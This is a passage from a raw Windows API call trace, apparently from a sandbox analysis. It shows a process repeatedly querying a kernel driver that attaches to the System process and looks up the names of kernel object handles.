0x7fff [0288.629] IoCompleteRequest () returned 0x0 [0288.629] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.629] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.629] PsAcquireProcessExitSynchronization () returned 0x0 [0288.629] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.629] ObReferenceObjectByHandle (in: Handle=0xffffffff80000594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d9db0, HandleInformation=0x0) returned 0x0 [0288.629] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.629] PsReleaseProcessExitSynchronization () returned 0x2 [0288.629] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b1 [0288.629] ObQueryNameString (in: Object=0xffffe000697d9db0, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.629] ObfDereferenceObject (Object=0xffffe000697d9db0) returned 0x7ffd [0288.629] IoCompleteRequest () returned 0x0 [0288.629] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x38, lpOverlapped=0x0) returned 1 [0288.629] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.629] PsAcquireProcessExitSynchronization () returned 0x0 [0288.629] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.629] ObReferenceObjectByHandle (in: Handle=0xffffffff80000598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069847db0, HandleInformation=0x0) returned 0x0 [0288.629] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.629] PsReleaseProcessExitSynchronization () returned 0x2 [0288.629] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b0 [0288.629] ObQueryNameString (in: Object=0xffffe00069847db0, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.629] ObfDereferenceObject (Object=0xffffe00069847db0) returned 0x7fff [0288.629] IoCompleteRequest () returned 0x0 [0288.630] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xf2, lpOverlapped=0x0) returned 1 [0288.630] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.630] PsAcquireProcessExitSynchronization () returned 0x0 [0288.630] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.630] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069847370, HandleInformation=0x0) returned 0x0 [0288.630] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.630] PsReleaseProcessExitSynchronization () returned 0x2 [0288.630] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8af [0288.630] ObQueryNameString (in: Object=0xffffe00069847370, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.630] ObfDereferenceObject (Object=0xffffe00069847370) returned 0x7fff [0288.630] IoCompleteRequest () returned 0x0 [0288.630] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x98, lpOverlapped=0x0) returned 1 [0288.630] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.630] PsAcquireProcessExitSynchronization () returned 0x0 [0288.630] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.630] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069846cd0, HandleInformation=0x0) returned 0x0 [0288.630] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.630] PsReleaseProcessExitSynchronization () returned 0x2 [0288.630] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ae [0288.630] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.630] ObfDereferenceObject (Object=0xffffe00069846cd0) returned 0x7f1a [0288.630] IoCompleteRequest () returned 0x0 [0288.630] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0288.630] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.630] PsAcquireProcessExitSynchronization () returned 0x0 [0288.630] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.630] ObReferenceObjectByHandle (in: Handle=0xffffffff800005a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067ebe870, HandleInformation=0x0) returned 0x0 [0288.630] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.630] PsReleaseProcessExitSynchronization () returned 0x2 [0288.630] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ad [0288.630] ObQueryNameString (in: Object=0xffffe00067ebe870, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.630] ObfDereferenceObject (Object=0xffffe00067ebe870) returned 0x7ffa [0288.630] IoCompleteRequest () returned 0x0 [0288.630] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0288.630] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.630] PsAcquireProcessExitSynchronization () returned 0x0 [0288.630] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.630] ObReferenceObjectByHandle (in: Handle=0xffffffff800005ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069845ad0, HandleInformation=0x0) returned 0x0 [0288.630] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.630] PsReleaseProcessExitSynchronization () returned 0x2 [0288.630] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ac [0288.631] ObQueryNameString (in: Object=0xffffe00069845ad0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.631] ObfDereferenceObject (Object=0xffffe00069845ad0) returned 0x7ffd [0288.631] IoCompleteRequest () returned 0x0 [0288.631] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x13c, lpOverlapped=0x0) returned 1 [0288.631] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.631] PsAcquireProcessExitSynchronization () returned 0x0 [0288.631] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.631] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006984ee20, HandleInformation=0x0) returned 0x0 [0288.631] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.631] PsReleaseProcessExitSynchronization () returned 0x2 [0288.631] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ab [0288.631] ObQueryNameString (in: Object=0xffffe0006984ee20, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.631] ObfDereferenceObject (Object=0xffffe0006984ee20) returned 0x7fff [0288.631] IoCompleteRequest () returned 0x0 [0288.631] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x13c, lpOverlapped=0x0) returned 1 [0288.631] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.631] PsAcquireProcessExitSynchronization () returned 0x0 [0288.631] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.631] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006984aca0, HandleInformation=0x0) returned 0x0 [0288.631] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.631] PsReleaseProcessExitSynchronization () returned 0x2 [0288.631] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8aa [0288.631] ObQueryNameString (in: Object=0xffffe0006984aca0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.631] ObfDereferenceObject (Object=0xffffe0006984aca0) returned 0x7fff [0288.631] IoCompleteRequest () returned 0x0 [0288.631] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.631] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.631] PsAcquireProcessExitSynchronization () returned 0x0 [0288.631] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.631] ObReferenceObjectByHandle (in: Handle=0xffffffff800005bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006953a8e0, HandleInformation=0x0) returned 0x0 [0288.631] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.631] PsReleaseProcessExitSynchronization () returned 0x2 [0288.631] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a9 [0288.631] ObQueryNameString (in: Object=0xffffe0006953a8e0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.631] ObfDereferenceObject (Object=0xffffe0006953a8e0) returned 0x7ffe [0288.631] IoCompleteRequest () returned 0x0 [0288.632] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.632] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.632] PsAcquireProcessExitSynchronization () returned 0x0 [0288.632] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.632] ObReferenceObjectByHandle (in: Handle=0xffffffff800005c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069715c90, HandleInformation=0x0) returned 0x0 [0288.632] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.632] PsReleaseProcessExitSynchronization () returned 0x2 [0288.632] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a8 [0288.632] ObQueryNameString (in: Object=0xffffe00069715c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.632] ObfDereferenceObject (Object=0xffffe00069715c90) returned 0x7fff [0288.632] IoCompleteRequest () returned 0x0 [0288.632] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0288.632] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.632] PsAcquireProcessExitSynchronization () returned 0x0 [0288.632] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.632] ObReferenceObjectByHandle (in: Handle=0xffffffff800005fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000804d4cc0, HandleInformation=0x0) returned 0x0 [0288.632] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.632] PsReleaseProcessExitSynchronization () returned 0x2 [0288.632] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a7 [0288.632] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.632] ObfDereferenceObject (Object=0xffffe000804d4cc0) returned 0x8008 [0288.632] IoCompleteRequest () returned 0x0 [0288.632] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.632] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.632] PsAcquireProcessExitSynchronization () returned 0x0 [0288.632] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.632] ObReferenceObjectByHandle (in: Handle=0xffffffff8000068c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069043370, HandleInformation=0x0) returned 0x0 [0288.632] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.632] PsReleaseProcessExitSynchronization () returned 0x2 [0288.632] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a6 [0288.632] ObQueryNameString (in: Object=0xffffe00069043370, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.632] ObfDereferenceObject (Object=0xffffe00069043370) returned 0x7fff [0288.632] IoCompleteRequest () returned 0x0 [0288.632] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.632] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.632] PsAcquireProcessExitSynchronization () returned 0x0 [0288.632] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.632] ObReferenceObjectByHandle (in: Handle=0xffffffff80000690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690b85e0, HandleInformation=0x0) returned 0x0 [0288.632] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.632] PsReleaseProcessExitSynchronization () returned 0x2 [0288.632] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a5 [0288.632] ObQueryNameString (in: Object=0xffffe000690b85e0, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.633] ObfDereferenceObject (Object=0xffffe000690b85e0) returned 0x7fff [0288.633] IoCompleteRequest () returned 0x0 [0288.633] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.633] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.633] PsAcquireProcessExitSynchronization () returned 0x0 [0288.633] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.633] ObReferenceObjectByHandle (in: Handle=0xffffffff80000698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069043f20, HandleInformation=0x0) returned 0x0 [0288.633] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.633] PsReleaseProcessExitSynchronization () returned 0x2 [0288.633] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a4 [0288.633] ObQueryNameString (in: Object=0xffffe00069043f20, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.633] ObfDereferenceObject (Object=0xffffe00069043f20) returned 0x7fff [0288.633] IoCompleteRequest () returned 0x0 [0288.633] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.633] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.633] PsAcquireProcessExitSynchronization () returned 0x0 [0288.633] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.633] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006903a900, HandleInformation=0x0) returned 0x0 [0288.633] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.633] PsReleaseProcessExitSynchronization () returned 0x2 [0288.633] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a3 [0288.633] ObQueryNameString (in: Object=0xffffe0006903a900, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.633] ObfDereferenceObject (Object=0xffffe0006903a900) returned 0x7fff [0288.633] IoCompleteRequest () returned 0x0 [0288.633] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.633] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.633] PsAcquireProcessExitSynchronization () returned 0x0 [0288.633] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.633] ObReferenceObjectByHandle (in: Handle=0xffffffff800006a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069038560, HandleInformation=0x0) returned 0x0 [0288.633] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.633] PsReleaseProcessExitSynchronization () returned 0x2 [0288.633] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a2 [0288.633] ObQueryNameString (in: Object=0xffffe00069038560, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.633] ObfDereferenceObject (Object=0xffffe00069038560) returned 0x7fff [0288.633] IoCompleteRequest () returned 0x0 [0288.633] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.633] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.633] PsAcquireProcessExitSynchronization () returned 0x0 [0288.633] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.633] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069038070, HandleInformation=0x0) returned 0x0 [0288.634] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.634] PsReleaseProcessExitSynchronization () returned 0x2 [0288.634] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a1 [0288.634] ObQueryNameString (in: Object=0xffffe00069038070, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.634] ObfDereferenceObject (Object=0xffffe00069038070) returned 0x7fff [0288.634] IoCompleteRequest () returned 0x0 [0288.634] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.634] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.634] PsAcquireProcessExitSynchronization () returned 0x0 [0288.634] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.634] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069031ce0, HandleInformation=0x0) returned 0x0 [0288.634] KeUnstackDetachProcess 